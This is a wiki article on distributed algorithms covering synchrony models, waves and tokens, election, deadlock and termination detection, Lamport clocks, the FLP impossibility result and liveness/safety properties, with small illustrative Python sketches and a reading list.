Distributed Algorithm
From CasGroup
A '''distributed algorithm''' is a decentralized algorithm that is executed in a [[Distributed System|distributed system]], on more than one machine, node or processor.

== Definition ==

A distributed algorithm for a collection P of processes is, according to Gerard Tel in his book ''Introduction to Distributed Algorithms'', simply a collection of local algorithms, one for each process in P. In his earlier work ''Topics in Distributed Algorithms'' he defined it as follows: "a distributed algorithm executes as a collection of sequential processes, all executing their part of the algorithm independently, but coordinating their activity through communication." Nancy A. Lynch argues: "Distributed algorithms are algorithms designed to run on hardware consisting of many interconnected processors. The algorithms are supposed to work correctly, even if the individual processors and communication channels operate at different speeds and even if some of the components fail."

In sequential algorithms, steps are taken in a strict, well-defined order. In distributed systems, steps are taken in a strict sequence only locally; globally, the sequence of steps depends on the transmission of messages and can be unpredictable. The order of events is not always well-defined, and failures make the situation even worse. Nearly all distributed algorithms are based on more or less sophisticated communication through message passing.
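Tel's definition can be made concrete with a minimal sketch: a collection of local algorithms, one per process, coordinating only through messages. The `Process` class and its `inbox` channel are illustrative names, not part of any source cited here.

```python
# A minimal sketch of a distributed algorithm in Tel's sense: each
# process runs its own local algorithm and coordinates with the others
# only by sending and receiving messages over a channel.
from queue import Queue

class Process:
    def __init__(self, pid):
        self.pid = pid
        self.inbox = Queue()          # models the incoming message channel

    def send(self, other, msg):
        other.inbox.put((self.pid, msg))

    def local_step(self):
        """One step of this process's local algorithm."""
        sender, msg = self.inbox.get()   # coordination happens via messages
        return f"process {self.pid} got {msg!r} from {sender}"

p, q = Process(0), Process(1)
p.send(q, "hello")
print(q.local_step())   # process 1 got 'hello' from 0
```

In a real system each process would run on its own node and the channel would be a network link; the queue here only stands in for that link.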
Since a [[Distributed System|distributed system]] consists of many nodes, processors or processes interconnected by a message passing network, any algorithm which involves more than one node must use some form of message passing, unless there is [[Distributed Shared Memory|distributed shared memory]] or another form of [[Interprocess Communication|interprocess communication]]. The complexity analysis of distributed algorithms therefore usually involves measuring the total number of messages.

Distributed algorithms are to sequential algorithms what Einstein's physics is to Newton's physics: sequential algorithms are a special, simplified case of distributed algorithms. In distributed algorithms there is no global time or common clock, and the observer and speed may influence causality. There are more similarities: for instance, according to F. Mattern, the Lorentz transformation corresponds roughly to the rubber-band transformation, which leaves causality invariant.

== Different Forms and Types ==

=== Asynchronous and Synchronous ===

In general, one can distinguish between asynchronous and synchronous algorithms, as Nancy Lynch does in her book. In asynchronous algorithms, the nodes and processes do not act at the same time, no timing assumptions exist, and messages can have an arbitrary delay; in synchronous algorithms, the nodes act in lockstep at the same time. Asynchronous algorithms are not synchronized: their steps do not occur at predetermined or regular intervals, and messages can be delivered in any order. Totally synchronous algorithms are easy to handle, because all nodes act like a single node at the same time, but they are not practical. They are difficult to justify in real-world situations and difficult to achieve in general distributed systems, because there is no absolute global time in general, unsynchronized processes operate at different speeds, and messages often have a considerable time delay.
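The lockstep behavior of the synchronous model can be illustrated with a small single-machine simulation: in each round, all nodes send first and all nodes receive afterwards. The example, which floods the maximum value around a ring, is a sketch under the assumption of a reliable, fully synchronous network; the function name is illustrative.

```python
# A sketch of the synchronous (lockstep) model: in every round all
# nodes send, then all nodes receive and update their state, in step.
# Here a ring floods the maximum value; after n-1 rounds every node
# knows the global maximum.
def synchronous_max_ring(values):
    n = len(values)
    state = list(values)
    for _ in range(n - 1):                    # n-1 lockstep rounds
        sent = list(state)                    # all sends happen first...
        for i in range(n):                    # ...then all receives
            state[i] = max(state[i], sent[(i - 1) % n])
    return state

print(synchronous_max_ring([3, 9, 1, 7]))  # [9, 9, 9, 9]
```

Note how the simulation enforces the model's timing assumption by construction: no node can observe a round-`k` message before all round-`k` sends are complete. An asynchronous network gives no such guarantee.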
In summary, systems with pure synchrony (perfect timing) or no faults at all would be nice, but they are not realistic: nodes and links fail, and messages may have a time delay. Totally asynchronous algorithms are powerful in theory, because they are meant to work with arbitrary time delay, but they are notoriously difficult to design. They are often very hard or even impossible to construct, because they are too general (for example, a node which sends arbitrarily slow messages is indistinguishable from a node that has really failed). Some problems that are provably impossible or expensive in the fully asynchronous model can indeed be solved in practice. Therefore, elegant theoretical assumptions such as pure asynchrony (no timing assumptions whatsoever) or Byzantine faults (no assumptions limiting faulty behavior) are not practical either; they lead to pessimistic and frustrating results that are not useful for complex real-world systems. Real systems are complex and tend to fall somewhere in between the two extreme classes of full synchrony and full asynchrony, for example asynchronous systems with finite average response times or upper bounds on message delivery times.

=== Topologies and Graphs ===

Besides asynchronous and synchronous forms, one can differentiate further between algorithms for particular topologies (rings, trees, etc.). There are also a number of [[Distributed Graph Algorithm]]s, which is not surprising, because nearly all [[Distributed System|distributed systems]] based on message passing can be described by a graph (except those which use only some form of shared common memory).

=== Fundamental algorithms ===

Fundamental building blocks used in many distributed algorithms are tokens (which circulate in rings) and waves (which spread through arbitrary topologies). A token which moves through a ring can be considered a wave for a ring topology.
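The wave idea can be sketched as an "echo"-style computation: a wave spreads out from an initiator over an arbitrary topology and the echoes return along the spanning tree it builds. The sketch below compresses this into a recursive traversal on one machine; the graph and function names are illustrative.

```python
# A sketch of a wave computation: the wave spreads from an initiator
# over an arbitrary topology, visiting every node exactly once; the
# recursive returns play the role of the echoes travelling back.
def echo_wave(graph, start):
    visited = set()
    order = []

    def visit(node):                 # the wave reaches `node`...
        visited.add(node)
        order.append(node)
        for nb in graph[node]:       # ...and propagates to its neighbours
            if nb not in visited:
                visit(nb)            # the return is the "echo"

    visit(start)
    return order

g = {0: [1, 2], 1: [0, 3], 2: [0, 3], 3: [1, 2]}
print(echo_wave(g, 0))  # [0, 1, 3, 2]
```

An "inform all" or "query all" action corresponds to attaching the information or the query to the wave as it passes each node.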
The importance of waves is not surprising, since a wave is one of the most basic forms of [[Emergence|emergence]] in a system. If all nodes are visited sequentially, or an action like "inform all" or "query all" is required, a kind of wave must be used. Fundamental algorithms where all nodes of a network are visited are [[Total Algorithm]]s and [[Heart Beat Algorithm]]s. A common problem besides "inform all" and "query all" is "select one", "elect one", "admit one", etc. The resulting algorithms are named [[Election Algorithm|election algorithms]], where a single node or process (for example the leader) that is to play a distinguished role in a subsequent computation must be (s)elected. Further typical algorithms in this area are distributed [[mutual exclusion]] and [[deadlock detection]] algorithms, where the concurrent use of un-shareable resources must be avoided. Finally, it is a problem of its own to determine and change the "global state" or the "global order"; the associated distributed algorithms are named [[Termination Detection|termination detection]], where the end of a distributed computation has to be detected, and distributed [[garbage collection]], where unused memory and references must be released. A basic "toy" algorithm used to explain distributed algorithms in classes is the [[Distributed GCD Algorithm|distributed GCD algorithm]].

== Problems and Difficulties ==

=== Uncertainties and Failures ===

Distributed algorithms are, like [[Distributed System|distributed systems]], hard to understand and hard to design, because of their high complexity. Algorithms are the step-by-step definitions of computations: detailed instructions, rules and recipes for producing a solution to a given problem in a finite number of steps. The problem with many real [[Distributed System|distributed systems]] is that every node and every link can fail at any time, and messages can get lost or arrive with an arbitrary time delay. One cannot say for sure what will happen in the next step.
One can specify the behavior for each node, but the overall global behavior which results from the local interactions is often hard to predict. The accidental or intended [[Emergence|emergence]] of a desirable behavior is more the exception than the rule. Analysis, design, verification and correctness proofs of distributed algorithms are difficult issues. Among the different types of uncertainties and difficulties are, for example (according to Nancy Lynch, 1996):

# processor and link failures (node or message loss)
# uncertain message delivery (arbitrary transmission time)
# unknown message ordering
# unknown network topologies
# unknown number of processors

Some problems which are characteristic of and unique to distributed algorithms are:

# [[Race Condition|race conditions]] (where the result depends on the timing of events)
# deadlock detection, esp. phantom- or pseudo-deadlocks
# termination detection

Detecting whether a centralized, serial or non-distributed algorithm has terminated is trivial, since there is only one processor, one clock and one well-defined state or time. Detecting whether a distributed algorithm has terminated is a problem of its own, since there is no global state or time in a general [[Distributed System|distributed system]]. Another problem which occurs in distributed algorithms but not in serial ones is deadlock: mutual blocking of processes, where each process is waiting for a resource one of the other processes holds. Obviously it does not occur in serial algorithms for one processor, and it was first encountered in implementing operating systems.

=== Problem Fields ===

Termination detection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm.
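Deadlock detection, listed among the characteristic problems above, reduces at its core to finding a cycle in a wait-for graph: process p "waits for" process q if p needs a resource that q holds. A minimal single-machine sketch (the graphs and names are illustrative; a distributed version would have to assemble this graph from local information, which is where phantom deadlocks arise):

```python
# A sketch of deadlock detection as cycle search on a wait-for graph:
# a cycle of waiting processes means none of them can ever proceed.
def has_deadlock(wait_for):
    WHITE, GRAY, BLACK = 0, 1, 2          # unvisited / on stack / done
    color = {p: WHITE for p in wait_for}

    def dfs(p):
        color[p] = GRAY
        for q in wait_for[p]:
            if color[q] == GRAY:          # back edge: a waiting cycle
                return True
            if color[q] == WHITE and dfs(q):
                return True
        color[p] = BLACK
        return False

    return any(color[p] == WHITE and dfs(p) for p in wait_for)

print(has_deadlock({"A": ["B"], "B": ["C"], "C": ["A"]}))  # True
print(has_deadlock({"A": ["B"], "B": ["C"], "C": []}))     # False
```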
A snapshot is "consistent" if it appears as if it were taken at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a "logical time" or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but real time is uniformly continuous, whereas logical time can have discontinuous jumps. These methods are problematic, however, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo et al. noticed in 1994, this approach ignores "the different failure modes and basic indeterminacy inherent in distributed computing" and leads to systems that are neither reliable nor scalable. Thus we have roughly the following problem fields:

# Attempts to imitate local computing (Synchronous Communication or Synchronization, Logical Time)
# Attempts to determine global state (Global Snapshots, Deadlock Detection, Termination)
# Attempts to reach a unified state (Agreement or Consensus)
# Attempts to coordinate access (Contention Problems such as Election and Mutual Exclusion)

=== Impossibility Results ===

Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guarantee of achieving a common consensus impossible, as the famous "FLP impossibility result" says.
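Returning to Lamport's logical clocks mentioned above, the rule is small enough to sketch directly: each process keeps a counter, increments it on every local event, stamps outgoing messages, and on receipt jumps past the stamp. Causally related events then receive increasing timestamps (the converse does not hold). The class below is a minimal sketch, not any particular library's API.

```python
# A sketch of Lamport's logical clocks: one counter per process,
# incremented on every event; a receiver jumps ahead of the sender's
# timestamp, so causally later events get larger timestamps.
class LamportClock:
    def __init__(self):
        self.time = 0

    def local_event(self):
        self.time += 1
        return self.time

    def send_event(self):
        self.time += 1
        return self.time          # timestamp attached to the message

    def receive_event(self, msg_time):
        self.time = max(self.time, msg_time) + 1   # jump past the sender
        return self.time

a, b = LamportClock(), LamportClock()
t = a.send_event()                 # a is now at 1
print(b.receive_event(t))          # b jumps to max(0, 1) + 1 = 2
```

Vector clocks extend this by keeping one counter per process, which additionally lets two events be recognized as causally unrelated.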
The "FLP impossibility result" or "FLP impossibility argument" from Fischer, Lynch and Paterson says it is impossible to guarantee consensus in a distributed, asynchronous system if even one process is faulty. To be more precise, it says there is no guarantee that a common consensus can be reached if a faulty process exists. This fact is intuitively plausible, since a faulty process that is no longer responding is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connections of the asynchronous network). Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problems in [[Distributed Computing|distributed computing]]: several processes have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be committed or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in Chapter 12, "Consensus", of her book), "the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all."

== Proof and Verification ==

The design and verification of distributed programs and algorithms is without doubt a very difficult task. A common way to verify distributed algorithms despite these difficulties is to verify liveness and safety properties.
The traditional definitions of liveness and safety are:

* '''Liveness''' means "something good will eventually occur" or "something good eventually happens"
* '''Safety''' means "something bad will never happen" or "no bad thing ever happens"

Liveness and safety are two complementary properties: one says that the system is changing, the other that the system is not changing. One claims that the program never enters an unacceptable state, the other asserts that the program always enters a desirable state after a finite number of steps.

=== Liveness ===

Liveness implies that the '''system is changing'''. There is a guarantee of progress, which in turn is guaranteed by the absence of deadlocks, the absence of infinite loops and the assurance of termination. It is a property stating that eventually (after a finite number of steps) some requirement holds. The program eventually enters a desirable state, and some assertion will eventually hold. In other words, every computation finally contains a state where a certain assertion is true. A liveness requirement demands that some property, in some reachable configuration, will eventually hold in every execution. Typical liveness properties are:

* Program termination: the algorithm will terminate in a finite amount of time
* Upper/lower bounds: a numerical value or parameter must reach a certain upper (or lower) bound (in this case liveness can be proved if the value is monotonically increasing (or decreasing) and never remains constant for an infinite amount of time)

=== Safety ===

Safety implies that the '''system does not change''': the program does nothing wrong, and there is a guarantee that no bad change takes place, which in turn is often proved by invariants. Invariants are assertions that always hold during the execution of the algorithm and are not affected by any action or operation of the algorithm. An invariant property must hold in every execution and in each reachable configuration.
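The invariant idea can be made concrete by brute force on a small example: enumerate every reachable configuration of a toy protocol and check the assertion in each one. The two-process lock protocol below, including its state encoding, is purely illustrative.

```python
# A sketch of safety verification by invariant checking: enumerate all
# reachable states of a toy two-process lock protocol and check the
# mutual-exclusion invariant in every one.
def reachable_states():
    # state: (pc0, pc1, lock); pc is "idle" or "crit", lock holds the
    # id of the process in its critical section, or None if free
    states, frontier = set(), [("idle", "idle", None)]
    while frontier:
        s = frontier.pop()
        if s in states:
            continue
        states.add(s)
        pc0, pc1, lock = s
        # a process may enter its critical section only if the lock is free
        if pc0 == "idle" and lock is None:
            frontier.append(("crit", pc1, 0))
        if pc1 == "idle" and lock is None:
            frontier.append((pc0, "crit", 1))
        # leaving the critical section releases the lock
        if pc0 == "crit":
            frontier.append(("idle", pc1, None))
        if pc1 == "crit":
            frontier.append((pc0, "idle", None))
    return states

# the invariant "never both in the critical section" holds in every state
assert all(not (pc0 == "crit" and pc1 == "crit")
           for pc0, pc1, _ in reachable_states())
print("mutual exclusion invariant holds in all reachable states")
```

This exhaustive enumeration is exactly what explicit-state model checkers automate; for real distributed algorithms the state space is usually far too large to list by hand.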
Safety properties specify that "something bad never happens": the program never enters an unacceptable state, and some assertion always holds. In other words, a certain assertion is true in every state of every computation of the algorithm. Typical safety properties are (see Owicki and Lamport, [http://research.microsoft.com/users/lamport/pubs/liveness.pdf Proving Liveness Properties of Concurrent Programs]):

* Partial correctness: if the algorithm begins with the precondition true, then it can never terminate with the postcondition false.
* Absence of deadlock: the algorithm never enters a state in which no further progress is possible.
* Absence of infinite loops: the algorithm never enters a state where one or more processes are involved in an infinite loop.
* Mutual exclusion: two different processes are never in their critical sections at the same time.

== Articles and Papers ==

Many classic publications by Leslie Lamport can be found on his [http://research.microsoft.com/users/lamport/pubs/pubs.html website] at Microsoft Research. Papers by Edsger W. Dijkstra can be found in the [http://www.cs.utexas.edu/users/EWD/ Dijkstra archives].

General:

* [http://www.sunlabs.com/techrep/1994/abstract-29.html A Note on Distributed Computing], Jim Waldo et al., Sun Technical Report TR-94-29 (1994)

Impossibility theorems and results:

* [http://portal.acm.org/citation.cfm?id=214121 Impossibility of Distributed Consensus with One Faulty Process], M. Fischer, N. Lynch, and M. Paterson, Journal of the ACM, Vol. 32, No. 2, April 1985, 374-382
* [http://doi.ieeecomputersociety.org/10.1109/MC.1992.10061 The Many Faces of Consensus in Distributed Systems], John Turek and Dennis Shasha, IEEE Computer, Vol. 25, No. 6 (1992), 8-17
* [http://citeseer.ist.psu.edu/572373.html A Hundred Impossibility Proofs for Distributed Computing], Nancy Lynch
* [http://citeseer.ist.psu.edu/623509.html Hundreds of Impossibility Results for Distributed Computing], Faith Fich and Eric Ruppert

== Books ==

* Nancy A. Lynch, ''Distributed Algorithms'', Morgan Kaufmann, 1996, ISBN 1558603484
* Gerard Tel, ''Introduction to Distributed Algorithms'', Cambridge University Press, 2nd edition, 2001, ISBN 0521794838
* Gerard Tel, ''Topics in Distributed Algorithms'', Cambridge University Press, 1991, ISBN 0521403766
* Valmir C. Barbosa, ''An Introduction to Distributed Algorithms'', The MIT Press, 1996, ISBN 0262024128
* Michel Raynal, ''Distributed Algorithms and Protocols'', John Wiley and Sons, 1988, ISBN 0471917540
* Hagit Attiya and Jennifer Welch, ''Distributed Computing'', John Wiley and Sons, 2nd edition, 2004, ISBN 0471453242
* Friedemann Mattern, ''Verteilte Basisalgorithmen'', Springer, 1989, ISBN 3540518355

== Lectures ==

Lecture in German from Hans P. Reiser and Rüdiger Kapitza, University of Erlangen-Nuremberg, 2003 [http://www4.informatik.uni-erlangen.de/Lehre/WS03/V_VA/Skript/]

Lectures in German from Prof. Dr. Friedemann Mattern, ETH Zurich: 1999/2000 [http://www.vs.inf.ethz.ch/edu/WS9900/VA/], 2001/2002 [http://www.vs.inf.ethz.ch/edu/WS0102/VA/], 2002/2003 [http://www.vs.inf.ethz.ch/edu/WS0203/VA/], 2003/2004 [http://www.vs.inf.ethz.ch/edu/WS0304/VA/], 2004/2005 [http://www.vs.inf.ethz.ch/edu/WS0405/VA/]